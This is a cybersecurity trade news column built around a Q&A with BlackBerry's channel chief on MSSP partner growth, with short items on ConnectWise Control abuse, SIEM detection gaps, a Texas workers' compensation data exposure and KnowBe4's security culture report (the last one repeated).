The Gately Report: BlackBerry Ups Investment, Support of MSSP Partners
Meantime, Blackpoint Cyber detects threat actors deploying attacks with ConnectWise Control.
![cyborg vector illustration cyborg vector illustration](https://eu-images.contentstack.com/v3/assets/blt10e444bce2d36aa8/blt89f753cf901a1e47/65242a4028ff1270b681d61e/Greport11.jpg?width=700&auto=webp&quality=80&disable=upscale)
Shutterstock
Channel Futures: Last month, BlackBerry reported its third consecutive quarter of sequential cybersecurity billings growth. What role did partners play in this growth?
Colleen McMillan: Our partners have been doing a pretty great job. We’ve had some really good growth areas, especially around the MSSP arena, where we’re seeing more and more customers looking for a managed service offering. They’re trying to have a simplified approach to cybersecurity and having someone help them with that, where they provide that managed service offering 24/7/365. So we did have some really solid growth in the MSSP space, which is all partner driven, as you can imagine. And our top MSSPs, some of them have just grown significantly, 70% to 80%. But if you’re to look at maybe the top 50, they’re experiencing 30%-plus growth. So really seeing that simplified type solution without sacrificing the security protection.
They can still rely on the AI-driven protection solution and then the partners can add in their managed service offering around that. That is where we’ve seen some incredible growth. And we’re still seeing 85%-plus maybe a point or two of partner interaction with our billings. And BlackBerry is very partner friendly and working to continue to grow the billings through that.
CF: How is BlackBerry helping its customers attract new customers?
CM: We have a program called Protect & Earn to help incentivize partners to go after net new [customers]. And we’ve seen tremendous growth there where our partners are rewarded favorably to go after net new [customers]. So we did pretty well with 300-plus new [customers] last year. That wasn’t for the whole year. That was from when the inception of the program. So we’re seeing tremendous value there and expanding our reach to more customers.
CF: BlackBerry has reported that MSPs are a viable target, particularly for ransomware attacks, due to their level of access to multiple customer networks and sensitive data. How can BlackBerry and its partners help MSPs stay safe?
CM: So obviously having access to our full suite of products — Protect, Optics, Gateway — and we’re also helping them with offering Guard, which is a managed service offering that they can offer to their customers as well. And the better we partner with them in terms of enablement, alignment in the field, having access to our technical engineers, all of that, we want to make sure that they’re offering not only the best security products, which is based on our AI-driven protection solutions, but also that they’re able to provide the the services that customers need.
CF: BlackBerry recently released its 2022 Threat Report, which revealed that malicious hacking attempts occur every 39 seconds, with SMEs facing upward of 11 cyber threats per device per day. Is there a message for partners in this report?
CM: I think the message is that it’s a dynamic environment. Customers are really challenged. And I’ve been at this 30-plus years working with customers and working in the IT space. And there’s never been a better opportunity to be in the partner community because customers need their help. Because it’s gotten so complex, it’s accelerating and so dynamic, it’s not a situation where it’s a nice to have.
So if partners are investing in cybersecurity in terms of skill set and partnerships, that’s going to have a pretty tremendous payoff because customers absolutely need their help. They cannot keep up with the changing demands. Everything’s being accelerated as they move to the cloud and migrate data over the whole proliferation of devices. We all have more and more devices. You have IoT as well, where everything’s online. That’s great because it shares information and it can do some really cool things, but it also offers an opportunity for access points where bad actors can take advantage of that. So it’s really a pretty compelling time for a customer to look to the partner community to help provide a simplified solution, not in terms of the technology or anything, but in terms of them being able to consume it. So it’s having a simplified solution where the partner … helps them cut through the noise and it offers a combination of products and managed service offerings in different ways that a consumer might want to buy.
CF: How would you describe BlackBerry’s global channel strategy? Is it evolving? Are changes taking place?
CM: I was brought in initially to really complete that whole unification of Cylance and legacy BlackBerry enterprise programs, take the two programs, put them together so that we make it easier both for BlackBerry partners, as well as Cylance partners. Now we’re one team, one channel, and we want to create that single, comprehensive global program where we’re investing in the partner. So I’ve been on board about 18 months now, and it’s really been so favorably received because when I first came in, we did a lot of surveys and I spent time working with the partners, hearing direct feedback, and it was great to hear the good and the bad. And so I’ve really been able to take that feedback and invest in the channel. I’ve added to the channel team. In terms of some new channel leadership, I’ve worked really closely to build closer alignment with the field sellers so that we are very channel friendly. We’ve invested in improving sales operations because obviously anytime you merge two programs together, two companies together, that’s an area where you can make it easier to work with. And partners really put a high value on being easier to work with.
We’ve made investments in MDF, not only the amount of MDF, but in the process of getting MDF. We’ve done some joint demand generation with BlackBerry Crush Days, which has been really favorably received. We’ve improved the partner enablement and access to portals. We’ve put things in multiple languages. So it’s all about creating this smooth transition so that the partner can really rely on us not only to be there, but support them in the best manner possible.
CF: What are partners’ most pressing needs when it comes to cybersecurity?
CM: To serve their customers, they need support. They need, obviously, access to information so that they can stay current and relevant, and that goes back to the concept of things are constantly changing very, very quickly. Everything’s accelerating. So how can we give them the right information at the right period of time. So when things come out from these ransomware attacks and these high-profile breaches, how can we respond with them or provide them the information quicker so they can respond to their customers to help protect them. So it’s all about staying in front of it, being there for them, supporting them with enablement, supporting them with briefings, and really being the experts because they are using our products and we are the experts on that.
I don’t think I can say there’s only one or two or maybe the top three things they need, because part of it depends on where they are in the lifecycle of the sale. But I see it as our job to make the customer successful in fighting off these cyberattacks. And to do that, we have to make our partners successful because if they’re successful in meeting the needs of the customer, we’ll ultimately be successful.
CF: What are your goals for BlackBerry’s channel for the remainder of 2022?
CM: The goals are around supporting customers in whichever way they decide to consume technology. I learned early on that different customers have different needs in how they consume their technology. Some might want to host it in cloud and some might want on-premises. So as customers really change the way they’re buying or consuming technology, we’re seeing a tremendous shift with the SMB and the midmarket because of the complexity of cybersecurity. And so how can we be responsive to supporting those partners that are going after that marketplace with subscription-based solutions and where it’s managed services, to then the classic enterprise that still wants to purchase in a resale motion.
We’re also seeing tremendous growth in OEM. So there’s a lot of customers that want to embed the technology and then they go sell their products. So they have to be supported differently. So I think the biggest challenge is always having your customer central to everything and then trying to go to market such that you support all partner types. It doesn’t matter what partner type it is. If they are touching the customer, we want to make sure we support them in the way that the customer wants to consume the technology.
In other cybersecurity news …
Threat actors have been using ConnectWise Control, MSP remote control software, to launch cyberattacks.
That’s according to Blackpoint Cyber. It described the methods of attack in a blog.
Jeff Bishop is ConnectWise’s chief product officer.
“We hate to see any software products used for malicious purposes, but unfortunately, remote control tools are used for this purpose all too frequently,” he said. “ConnectWise works diligently to prevent the misuse of our products through online training and educational material, and by implementing AI and machine learning to detect malicious actors that may be using Control to ‘scam’ end users.”
Designed to offer help desk-style services, ConnectWise Control, also known as ScreenConnect, allows for full remote control of an endpoint, Blackpoint said.
“ScreenConnect has two main features appealing to threat actors,” it said. “The first is known as ‘backstage mode’ which allows for complete access to the Windows terminal and PowerShell without the logged-on user being aware. This is the primary use case observed by Blackpoint. The second is a mass-deployment feature for the agent based on the subnet or address resolution protocol (ARP) table. While this is a similar feature to Total Software Deployment (TSD), this tool allows for another avenue of lateral movement. Blackpoint has yet to see attackers use this feature in earnest.”
When access is obtained, Control is then able to issue further commands such as running PowerShell commands to download malicious payloads or ensure persistence using Registry Editor (regedit). Fortunately, in all examined cases where devices were monitored, Blackpoint was able to prevent any such capabilities from being run.”
Control is available for a monthly cost of around $30, Blackpoint said.
“Unfortunately, threat actors are circumventing this cost by exploiting freely offered trials of the software,” it said. “ScreenConnect only requires the user to provide an email address, password and the name of their preferred ScreenConnect URL. Sadly, there are no measures in place to easily identify when threat actors are using trial versions of software. Nevertheless, the capabilities employed by these actors can still be identified and remediated.”
When these attacks are detected or reported, ConnectWise works with the appropriate authorities to assist them in taking action against these malicious actors, Bishop said.
“If a company or individual believes that ConnectWise Control was used in an exploit or their instance has been exploited, we encourage them to report the details of the activity on this page,” he said.
New CardinalOps research shows security information and event management (SIEM) solutions aren’t detecting 80% of MITRE ATT&CK adversary techniques.
MITRE ATT&CK is the industry-standard catalog of common adversary behaviors based on real-world observations. The analysis shows actual detection coverage remains far below what most organizations expect. Moreover, many organizations are unaware of the gap between their assumed theoretical security and the defenses they actually have in place.
The data set for this analysis spanned diverse SIEM solutions encompassing more than 14,000 log sources, thousands of detection rules, and hundreds of log source types. They also spanned diverse industry verticals including financial services, manufacturing, telecommunications, and MSSP/MDR service providers.
Using MITRE ATT&CK as the baseline, CardinalOps found that, on average:
Enterprise SIEMs contain detections for fewer than five of the top 14 ATT&CK techniques employed by adversaries in the wild.
SIEMs are missing detections for 80% of the complete list of 190-plus ATT&CK techniques.
Fifteen percent of SIEM rules are broken. That’s primarily due to fields that are not extracted correctly or log sources that are not sending the required data.
Seventy-five percent of organizations that forward identity logs such as Active Directory and Okta to their SIEM do not use them. That’s concerning because identity monitoring is one of the most critical data sources for strengthening zero trust.
Seventy-five percent of out-of-the-box detection content provided by SIEM vendors is disabled due to noisiness and customization challenges experienced by detection engineering teams.
These major gaps in detection coverage can be attributed to a number of challenges faced by security operations centers (SOCs) and their detection engineering teams. At the top of the list is constant change in the threat landscape, organizational attack surfaces, and business priorities, combined with increasing complexity resulting from an ever-increasing number of log source types and telemetry from diverse data sources.
Difficulty in recruiting and retaining skilled security personnel is also a major factor. And many enterprises are still relying on manual and error-prone processes for developing new detections, which makes it difficult for engineering teams to scale effectively and reduce their backlogs, according to CardinalOps.
Michael Mumcuoglu is CardinalOps’ CEO and co-founder.
“Our goal with creating this report was not to shame security teams for having blind spots, but rather to draw management-level attention to the disparity between perceived security and actual detection quality and coverage, using MITRE ATT&CK as the benchmark,” he said. “If we’re spending all this time and money on more security tools, why are we still being hacked? We believe the answer lies in the need to apply automation and analytics to identify and fix misconfigurations in existing tools, as well as remediate the riskiest detection gaps, in order to free detection engineers to focus on more strategic activities such as investigating new and novel attack scenarios.”
Confidential personal data of 1.8 million Texans was exposed and available to the public for almost three years. The data was from Texans who filed workers’ compensation claims with the Texas Department of Insurance.
That’s according to CNET. The information includes names, Social Security numbers, addresses, phone numbers and dates of birth. It was publicly available online from March 2019 until January 2022.
According to a state audit report, the issue was caused by programming code that allowed internet access to a protected area of the application.
“The department is offering 12 months of credit monitoring and identity protection services at no cost to those who may have been affected by the issue,” it said.
Neil Jones is director of cybersecurity evangelism at Egnyte.
“The recent data breach at the Texas Department of Insurance is especially concerning because workers’ compensation data inherently includes personally identifiable information (PII) and protected health information (PHI), which are potential treasure troves for cyberattackers,” he said. “Although there’s no current evidence that the breached information has been used maliciously, it is not uncommon for attackers to wait for just the right time to post their breached data to the dark web. There are several key lessons that can be learned from this incident. Organizations need to combine data security with effective application security testing and penetration testing programs. Stress testing needs to be conducted before an application’s brought live to end-users in a public setting. During these dynamic times, routine technological audits need to occur on a more frequent basis than they did before, to prevent vulnerabilities from being exploited.”
Security culture, a workforce’s shared attitudes, perceptions and beliefs towards cybersecurity, has improved globally, according to KnowBe4 research.
The 2022 KnowBe4 Security Culture Report looked at the seven different dimensions of security culture across regions and industries worldwide. Those include attitudes, behaviors, cognition, communication, compliance, norms and responsibilities.
The report includes responses from more than 257,000 employees in 1,456 organizations globally who are also KnowBe4 customers and have completed the security culture survey.
Key findings include:
In the United States, differences in security culture exist based on organizational size, where small organizations are outperforming larger ones.
In Africa, there is a tradition and interest in security culture, especially in South Africa, where a higher level of security culture was achieved.
In Asia, a wide variation of security culture scores across nations exists. While Japan is doing reasonably well, countries like Malaysia and Indonesia show an alarmingly low security culture index score.
In Europe, both Sweden and Ireland are often considered as technologically advanced. Along with these two countries, Italy and Bulgaria also had higher security culture scores.
Security culture in Oceania is showing that Australia and New Zealand are quite different from each other, and neither is doing particularly well.
Central and South America are now beginning to measure security culture, with more countries from these regions added every year.
Roger Grimes is data-driven defense evangelist at KnowBe4.
“We have not finished analyzing all the data yet, but in general, any smaller group of people is easier to control than a larger group of people,” he said. “Larger groups of people have a wider initial viewpoint, different experiences and different biases. Smaller groups, where you have a higher percentage of direct individual friendships and relationships, can make sharing a culture easier.”
Everyone, large or small, is invested in reversing the trend once they understand the issue, Grimes said. It’s also a matter of maturity, regardless of size. It takes time to realize there is a big, common problem like social engineering and phishing attacks or just general insecurity.
Ransomware and other cyberattacks making big headlines helps raise awareness, he said.
“The doubling of cybersecurity insurance and all the things cyber insurers require is another big stimulant,” Grimes said. “On top of that, the U.S. president routinely talks about it on national television as well as an incredibly timely and valuable government agency, the Cybersecurity and Infrastructure Security Agency (CISA). So, it really is a whole country effort, from individuals to national government agencies all trying to help change the culture. Sometimes it only takes a village, and sometimes it takes a nation and national culture change. We are all in on that concept.”
Security culture, a workforce’s shared attitudes, perceptions and beliefs towards cybersecurity, has improved globally, according to KnowBe4 research.
The 2022 KnowBe4 Security Culture Report looked at the seven different dimensions of security culture across regions and industries worldwide. Those include attitudes, behaviors, cognition, communication, compliance, norms and responsibilities.
The report includes responses from more than 257,000 employees in 1,456 organizations globally who are also KnowBe4 customers and have completed the security culture survey.
Key findings include:
In the United States, differences in security culture exist based on organizational size, where small organizations are outperforming larger ones.
In Africa, there is a tradition and interest in security culture, especially in South Africa, where a higher level of security culture was achieved.
In Asia, a wide variation of security culture scores across nations exists. While Japan is doing reasonably well, countries like Malaysia and Indonesia show an alarmingly low security culture index score.
In Europe, both Sweden and Ireland are often considered as technologically advanced. Along with these two countries, Italy and Bulgaria also had higher security culture scores.
Security culture in Oceania is showing that Australia and New Zealand are quite different from each other, and neither is doing particularly well.
Central and South America are now beginning to measure security culture, with more countries from these regions added every year.
Roger Grimes is data-driven defense evangelist at KnowBe4.
“We have not finished analyzing all the data yet, but in general, any smaller group of people is easier to control than a larger group of people,” he said. “Larger groups of people have a wider initial viewpoint, different experiences and different biases. Smaller groups, where you have a higher percentage of direct individual friendships and relationships, can make sharing a culture easier.”
Everyone, large or small, is invested in reversing the trend once they understand the issue, Grimes said. It’s also a matter of maturity, regardless of size. It takes time to realize there is a big, common problem like social engineering and phishing attacks or just general insecurity.
Ransomware and other cyberattacks making big headlines helps raise awareness, he said.
“The doubling of cybersecurity insurance and all the things cyber insurers require is another big stimulant,” Grimes said. “On top of that, the U.S. president routinely talks about it on national television as well as an incredibly timely and valuable government agency, the Cybersecurity and Infrastructure Security Agency (CISA). So, it really is a whole country effort, from individuals to national government agencies all trying to help change the culture. Sometimes it only takes a village, and sometimes it takes a nation and national culture change. We are all in on that concept.”
BlackBerry is accelerating its work with MSSP partners as the managed security services marketplace is expected to skyrocket through 2030.
BlackBerry’s Colleen McMillan
That’s according to Colleen McMillan, BlackBerry’s vice president of global channel sales. She leads the company’s global channel strategy.
The managed security services marketplace should grow from about $22 billion to over $77 billion from 2020 to 2030. That’s good news for BlackBerry MSSP partners.
“That’s a pretty good indicator that we’re going to see more and more growth around the managed service marketplace,” McMillan said. “So obviously we’re making tremendous investments there to support our MSSPs. We’ve doubled the team.”
Augmenting BlackBerry’s Cybersecurity Team
![The-Gately-Report-logo-300x200.jpg The-Gately-Report-logo-300x200.jpg](https://eu-images.contentstack.com/v3/assets/blt10e444bce2d36aa8/bltce2da383eb547efc/6523eae551b6a59073b16c36/The-Gately-Report-logo-300x200.jpg?width=700&auto=webp&quality=80&disable=upscale)
Last fall, John Giamatteo, formerly McAfee’s president and chief revenue officer, became president of BlackBerry’s cybersecurity business unit.
“He’s really done a fabulous job of bringing on a number of key individuals that have tremendous cybersecurity experience,” McMillan said. “We have a new vice president to head up research and threat intelligence and we have a new CTO. So there’s a lot of really solid cybersecurity credentialed folks that are at the helm making a difference. I think it’s exciting for our partners. And I’m just very optimistic about being here at this moment.”
For its fourth-quarter 2022 earnings, BlackBerry reported total company revenue of $185 million. Cybersecurity revenue totaled $122 million.
Cylance, which BlackBerry acquired in 2019, has been rebranded to BlackBerry Security. BlackBerry added Cylance artificial intelligence (AI) technology to its portfolio of cybersecurity innovations.
Scroll through our slideshow above for a Q&A with McMillan and more cybersecurity news.
Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn. |
About the Author(s)
You May Also Like